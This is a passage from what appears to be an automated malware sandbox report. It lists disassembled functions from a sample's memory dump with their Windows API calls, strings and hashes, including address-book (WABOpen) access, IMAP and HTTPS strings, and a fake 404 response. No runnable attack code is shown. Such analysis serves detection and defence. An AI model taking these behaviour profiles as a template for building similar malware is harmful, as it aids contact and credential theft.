                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heaplstrlen$AllocateFree
                                                                                                                                        • String ID: %S_%S$IMAP$_iF
                                                                                                                                        • API String ID: 4278773593-2484044307
                                                                                                                                        • Opcode ID: dfe1256c68e27e91f06b070880ca25653155b408f522d3201bf9ff5aa0b3ffd0
                                                                                                                                        • Instruction ID: 99dcc7f8b5287934a2377b1b54f250c05d299a4b02e75aa861920a719cacc9a8
                                                                                                                                        • Opcode Fuzzy Hash: dfe1256c68e27e91f06b070880ca25653155b408f522d3201bf9ff5aa0b3ffd0
                                                                                                                                        • Instruction Fuzzy Hash: 2FF0E932A01218778B116FA99C44DDF7B9CFF483647044827FD0497202DA75D82187E8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00458584, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,004497D3,?), ref: 0045858C
                                                                                                                                        • GetVersion.KERNEL32 ref: 0045859B
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004585AA
                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004585C7
                                                                                                                                        • GetLastError.KERNEL32 ref: 004585E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2270775618-0
                                                                                                                                        • Opcode ID: f1a95671b5081b23bb8483ff8595098b402793653487b3e844c8d8bd172d8589
                                                                                                                                        • Instruction ID: b9d013a79aef3e23989765620fa0f671521532e0dace190d9b0128da5a023947
                                                                                                                                        • Opcode Fuzzy Hash: f1a95671b5081b23bb8483ff8595098b402793653487b3e844c8d8bd172d8589
                                                                                                                                        • Instruction Fuzzy Hash: F7F0F974698318BFD3509B25AC09B163BE4A704752F100A3EE506D51E2FFF48549DA1F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044AE54, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,00000000), ref: 0044AF37
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,0046E088,?,?,?,00444EBD), ref: 0044AFA9
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0044AFBA
                                                                                                                                          • Part of subcall function 00453C8D: RtlLeaveCriticalSection.NTDLL(?), ref: 00453D0A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
                                                                                                                                        • String ID: HTTP/1.1 404 Not Found
                                                                                                                                        • API String ID: 4231733408-2072751538
                                                                                                                                        • Opcode ID: 8117b4c068e87158f7693455c77d79f6229fe0df5406aa9fdb577f6c4d8b4aed
                                                                                                                                        • Instruction ID: cce68cb156496ea9dcfed36303305fb32088b289b5877a561329a9d5b2d71e36
                                                                                                                                        • Opcode Fuzzy Hash: 8117b4c068e87158f7693455c77d79f6229fe0df5406aa9fdb577f6c4d8b4aed
                                                                                                                                        • Instruction Fuzzy Hash: 3F61B0B0640606FFFB119F25C980BA7B7A5FF08345F14402AF90486A51E779ED39CB8A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044E818, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 0044E84C
                                                                                                                                        • RtlFreeAnsiString.NTDLL(?), ref: 0044E8CC
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 0044E8D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
                                                                                                                                        • String ID: e6"
                                                                                                                                        • API String ID: 2603241602-59706174
                                                                                                                                        • Opcode ID: 7e5bf579ef31c9af4ed8be5bad97023893d496edb10256db9e8aeb1ea85bec6e
                                                                                                                                        • Instruction ID: eaebc32215e750ce367a555846f1999559e1a3e6d07a9ff0677853b3ab8fa0dc
                                                                                                                                        • Opcode Fuzzy Hash: 7e5bf579ef31c9af4ed8be5bad97023893d496edb10256db9e8aeb1ea85bec6e
                                                                                                                                        • Instruction Fuzzy Hash: 5D21D771504215AFFF14EF67988986BB3A9BB80301B04492FF580D31A0D774DD58DB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00452D12, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00452D7D
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00452D92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleObjectSingleWait
                                                                                                                                        • String ID: ]hF$qhF
                                                                                                                                        • API String ID: 528846559-2760001747
                                                                                                                                        • Opcode ID: 71608e59c979f7a556fd0f4719ce4a02e2be92af65b96954d14d299697c951b6
                                                                                                                                        • Instruction ID: a3ca5b424a39c81125591aafd864ae25c374c2eff3bee88e9bdd47551fcf9856
                                                                                                                                        • Opcode Fuzzy Hash: 71608e59c979f7a556fd0f4719ce4a02e2be92af65b96954d14d299697c951b6
                                                                                                                                        • Instruction Fuzzy Hash: 98211D71D00119AFDB10AFA8DC848EEBBB9FB08351F004576FD25E32A0E3B49D588B95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044FD5F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memorysynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • UnregisterWait.KERNEL32(?), ref: 0044FD90
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000064,?,?,?,00000000), ref: 0044FDE1
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0044FDFD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$FreeHeapObjectSingleUnregister
                                                                                                                                        • String ID: ShF
                                                                                                                                        • API String ID: 3104896675-2736803057
                                                                                                                                        • Opcode ID: 8f11134637c519ef9d6d6127092cdc88cc09eb163ad3f1b6cf31e7b420a04fd0
                                                                                                                                        • Instruction ID: 41367507f29dca157d20015469268d8823a24cea4484827356ebeea46b0f9990
                                                                                                                                        • Opcode Fuzzy Hash: 8f11134637c519ef9d6d6127092cdc88cc09eb163ad3f1b6cf31e7b420a04fd0
                                                                                                                                        • Instruction Fuzzy Hash: D4118E31600601AFEB215F19DC05F57BBB6EF45321F104A3AF5AA821B0EBB1AC59CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00453AB8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 00453ACF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00443500,?,?,00000001), ref: 00453B2F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                        • String ID: &dF$cF
                                                                                                                                        • API String ID: 2488874121-198834661
                                                                                                                                        • Opcode ID: 974a87409fd4f7abfc56623f61fe76ef037fef2bd92c038ce4680569cae9fea5
                                                                                                                                        • Instruction ID: dfb9d58fb929042cae3876c547246208ead1a86314f65f5510560bed3634adb6
                                                                                                                                        • Opcode Fuzzy Hash: 974a87409fd4f7abfc56623f61fe76ef037fef2bd92c038ce4680569cae9fea5
                                                                                                                                        • Instruction Fuzzy Hash: 8D01B971A00205AFC3119F52DC48E677FACFB55392B00053EF446C1121EBB19808CA69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044BCA6, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShellWindow
                                                                                                                                        • String ID: gmF$qmF${mF
                                                                                                                                        • API String ID: 2831631499-4145778643
                                                                                                                                        • Opcode ID: d11b2e22bebb416dcc7565aade0d7ba0fbf5d35eaad4e95afab5ad26b37552b1
                                                                                                                                        • Instruction ID: 9795ebc5c1c90831c4e427d06aa9f5bcb3694f6d414dac8d8f1976869dea6e36
                                                                                                                                        • Opcode Fuzzy Hash: d11b2e22bebb416dcc7565aade0d7ba0fbf5d35eaad4e95afab5ad26b37552b1
                                                                                                                                        • Instruction Fuzzy Hash: 2311D6B0E007059BEB20AFB5DD49B1ABBF4EB94701F10892DE256C7290EBB4E440CB55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442147, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,?,?), ref: 0044218B
                                                                                                                                        • StrToIntExA.SHLWAPI(00007830,00000001,?), ref: 0044219D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID: 0x$7gF
                                                                                                                                        • API String ID: 3510742995-3345866681
                                                                                                                                        • Opcode ID: 56b75deeaf5c01936e8d3846585879aef695e3de0c5ee518e676cd2b59d541a1
                                                                                                                                        • Instruction ID: d63445e676afaa434b6824df417fb4d79540f3011710f9f2b6a472db442ddeee
                                                                                                                                        • Opcode Fuzzy Hash: 56b75deeaf5c01936e8d3846585879aef695e3de0c5ee518e676cd2b59d541a1
                                                                                                                                        • Instruction Fuzzy Hash: 5701BC36A00109BBEB00DFA9CD45AAFBBB9FB44304F444026F904E7240EBB4DA08C796
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00441322, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00441333
                                                                                                                                        • lstrcmp.KERNEL32(?,?), ref: 00441357
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00441371
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeavelstrcmp
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 4188137280-3652835401
                                                                                                                                        • Opcode ID: 3c1a1feced84260ab953f38615fff6f595da58d7bf03694fb3212ce3f06ea8ad
                                                                                                                                        • Instruction ID: 95f6ba6c810b5bde9f31f74af2fdb43a28324e9edf0361d5c891b6160e1d1eb3
                                                                                                                                        • Opcode Fuzzy Hash: 3c1a1feced84260ab953f38615fff6f595da58d7bf03694fb3212ce3f06ea8ad
                                                                                                                                        • Instruction Fuzzy Hash: 14F06D75600204EBEB209F46DC84E9AB7B9FB51360B10456AE802A7260D778ED80DB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AC61, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045ACEB
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045ACFC
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045AD14
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045AD2E
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045AD43
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap$CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1910495013-0
                                                                                                                                        • Opcode ID: 273550f28d3f42e7ddb89d741d1259f78ba439d90661fce7ef419045c3c74c52
                                                                                                                                        • Instruction ID: 53ffc14d0f6137a384dd5bec5875efa8125d6d723f4d8e1ad5c6d2716cc29ff4
                                                                                                                                        • Opcode Fuzzy Hash: 273550f28d3f42e7ddb89d741d1259f78ba439d90661fce7ef419045c3c74c52
                                                                                                                                        • Instruction Fuzzy Hash: DF315A70601121AFC712DF65DD88C1AFBA6FF05B123544A16F809C7622C739FCA5CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00448ABC, Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044DB26: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0044DB41
                                                                                                                                          • Part of subcall function 0044DB26: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0044DB8F
                                                                                                                                          • Part of subcall function 0044DB26: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 0044DBA1
                                                                                                                                          • Part of subcall function 0044DB26: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0044DBF2
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 00448C4A
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000001), ref: 00448CB2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1730969706-0
                                                                                                                                        • Opcode ID: b737bc9b79add23105b36d0c28b081d7bd78c643b41f74985bb3a627f8ace1d1
                                                                                                                                        • Instruction ID: c2015e2f8e7cdf4813e94837097ebfae97044b227f8b7542ac9e495d24665cdd
                                                                                                                                        • Opcode Fuzzy Hash: b737bc9b79add23105b36d0c28b081d7bd78c643b41f74985bb3a627f8ace1d1
                                                                                                                                        • Instruction Fuzzy Hash: 1771DFB1E00209EFDF00DFA5C9849AEBBB9FF48304B10856EE515A7251DB35AD81CF64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004507CC, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00450879
                                                                                                                                        • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0045088F
                                                                                                                                        • memset.NTDLL ref: 0045092F
                                                                                                                                        • memset.NTDLL ref: 0045093F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$_allmul_aulldiv
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3041852380-0
                                                                                                                                        • Opcode ID: b0b94d6ac61dcf3843f36c251d69647dc6b487ddf63aa569b67a7cd62c2c0da2
                                                                                                                                        • Instruction ID: 070b7a1da95d2692692dcbc3649c8cb7202e94715be5cae7d27be9cd779674e0
                                                                                                                                        • Opcode Fuzzy Hash: b0b94d6ac61dcf3843f36c251d69647dc6b487ddf63aa569b67a7cd62c2c0da2
                                                                                                                                        • Instruction Fuzzy Hash: FE41B435A00209ABDB10AF99CC41FEE7774EF44314F10852BFD1AAB282E7789D59CB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00463207, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000,`F,00000000,74B05520), ref: 0046323B
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00463333
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0046336C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID: `F
                                                                                                                                        • API String ID: 3298025750-3520748611
                                                                                                                                        • Opcode ID: 6a60be435a5ca24d7d80a9ee62072c77e85cc9b5641523562759c5ebb9b6debd
                                                                                                                                        • Instruction ID: b60f5b2c5a7e35d1a1eeab1c1b2234c118511edb54dc90a3450521c0cfcaad59
                                                                                                                                        • Opcode Fuzzy Hash: 6a60be435a5ca24d7d80a9ee62072c77e85cc9b5641523562759c5ebb9b6debd
                                                                                                                                        • Instruction Fuzzy Hash: 1F416F31E00249EFDF20DFA5DD409AEB7B5FB08346F14846AE801E2250F7349E85CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044F4FC, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E261: RtlAllocateHeap.NTDLL(00000000,?), ref: 0044E293
                                                                                                                                          • Part of subcall function 0044E261: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,0044C2DA,?,00000022), ref: 0044E2B8
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5B6
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5D6
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5E2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Allocate
                                                                                                                                        • String ID: https://
                                                                                                                                        • API String ID: 3472947110-4275131719
                                                                                                                                        • Opcode ID: 40a997bc61c7f6331dbca602844c267e2aa5871b07e667abe913710fb57424bd
                                                                                                                                        • Instruction ID: 31b23554c1f923aaf266610d7a83c12147f302a2e17e6ebd8750ba6f80e9cf18
                                                                                                                                        • Opcode Fuzzy Hash: 40a997bc61c7f6331dbca602844c267e2aa5871b07e667abe913710fb57424bd
                                                                                                                                        • Instruction Fuzzy Hash: FD21DD31900118BBEF22AF51DC84E9F7F69EB01744F00803BF804A6162D7B98E95DB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045BCEA, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • TlsGetValue.KERNEL32(?), ref: 0045BD19
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 0045BD63
                                                                                                                                        • TlsSetValue.KERNEL32(00000001), ref: 0045BD9D
                                                                                                                                        • TlsSetValue.KERNEL32(00000000), ref: 0045BDB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$Event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3803239005-0
                                                                                                                                        • Opcode ID: 7d0dd516aac162912830fe7069b5f075a8b83e5c70edba7e8d594c3bce639d84
                                                                                                                                        • Instruction ID: e321aaec4b2eb9a9aa80aef525085c1fd7f741a518a92428e05bbf9f0e9cc37a
                                                                                                                                        • Opcode Fuzzy Hash: 7d0dd516aac162912830fe7069b5f075a8b83e5c70edba7e8d594c3bce639d84
                                                                                                                                        • Instruction Fuzzy Hash: 6921E071200204EFDF259F19DC8599B7BB6FF41352B10042AF812CA2B1D7B9EC99DB89
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00465BFE, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00465C14
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 00465C2F
                                                                                                                                        • GetLastError.KERNEL32 ref: 00465C9D
                                                                                                                                        • GetLastError.KERNEL32 ref: 00465CAC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2124651672-0
                                                                                                                                        • Opcode ID: d6f83a45f394f8c4999d9b1af87b15d9f25f5abb0bfb888e16f32d2ad05926a7
                                                                                                                                        • Instruction ID: f0ff633d356650140c6fcf429968a29519c3a7ad36d533e737d3473a71b9f1ea
                                                                                                                                        • Opcode Fuzzy Hash: d6f83a45f394f8c4999d9b1af87b15d9f25f5abb0bfb888e16f32d2ad05926a7
                                                                                                                                        • Instruction Fuzzy Hash: C5211975900608EFCB128F99DD44ADE7BB8FF45710F11415AF901A2250EB74DA12EB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00458DF7, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00458E19
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 00458E5D
                                                                                                                                        • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 00458EA3
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?), ref: 00458EC6
                                                                                                                                          • Part of subcall function 00450A3B: GetTickCount.KERNEL32 ref: 00450A4B
                                                                                                                                          • Part of subcall function 00450A3B: CreateFileW.KERNEL32(0046088E,80000000,00000003,0046E0F8,00000003,00000000,00000000,?,0046088E,?,00000000,?,00000000), ref: 00450A68
                                                                                                                                          • Part of subcall function 00450A3B: GetFileSize.KERNEL32(0046088E,00000000,Local\,00000001,?,0046088E,?,00000000,?,00000000), ref: 00450A94
                                                                                                                                          • Part of subcall function 00450A3B: CreateFileMappingA.KERNEL32(0046088E,0046E0F8,00000002,00000000,00000000,0046088E), ref: 00450AA8
                                                                                                                                          • Part of subcall function 00450A3B: lstrlen.KERNEL32(0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AC4
                                                                                                                                          • Part of subcall function 00450A3B: lstrcpy.KERNEL32(?,0046088E), ref: 00450AD4
                                                                                                                                          • Part of subcall function 00450A3B: HeapFree.KERNEL32(00000000,0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AEF
                                                                                                                                          • Part of subcall function 00450A3B: CloseHandle.KERNEL32(0046088E,Local\,00000001,?,0046088E), ref: 00450B01
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3239194699-0
                                                                                                                                        • Opcode ID: 738508ca0dd423cde6b822be9d47f6e8bca716df7f857db20e50697d3b14f551
                                                                                                                                        • Instruction ID: aa7b9aa9839b6836a663a67e03c13bfa34ffdb8210aebbcf1343906107c6d70f
                                                                                                                                        • Opcode Fuzzy Hash: 738508ca0dd423cde6b822be9d47f6e8bca716df7f857db20e50697d3b14f551
                                                                                                                                        • Instruction Fuzzy Hash: C6217171500208EBDB21DF66CC45DEE7BB8EF84316F10052AFD14E2262EF388949CB55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045CEF3, Relevance: 6.1, APIs: 4, Instructions: 71memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF18
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0045CF30
                                                                                                                                        • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF74
                                                                                                                                        • memcpy.NTDLL(00000001,?,00000001), ref: 0045CF95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1819133394-0
                                                                                                                                        • Opcode ID: 555c2caf03564f973b076ca6325678e24f6c1f07a30cd1d8b3be44d1b9eb8390
                                                                                                                                        • Instruction ID: 81d33508a9035cbd4c8d567098bc3dd856f9d8d31f6b7e0c4d77b10693b00b07
                                                                                                                                        • Opcode Fuzzy Hash: 555c2caf03564f973b076ca6325678e24f6c1f07a30cd1d8b3be44d1b9eb8390
                                                                                                                                        • Instruction Fuzzy Hash: 84118C76A04254AFC7108B66CCC8D9EBFA9DF81351F0902BFF805D7192E6B44E09C756
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044EDA7, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004649E9: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0044EDBE), ref: 00464A0F
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044EDF9
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0044C683,4C72644C), ref: 0044EE0B
                                                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0044C683,4C72644C), ref: 0044EE23
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,0044C683,4C72644C), ref: 0044EE3E
                                                                                                                                        Memory Dump Source
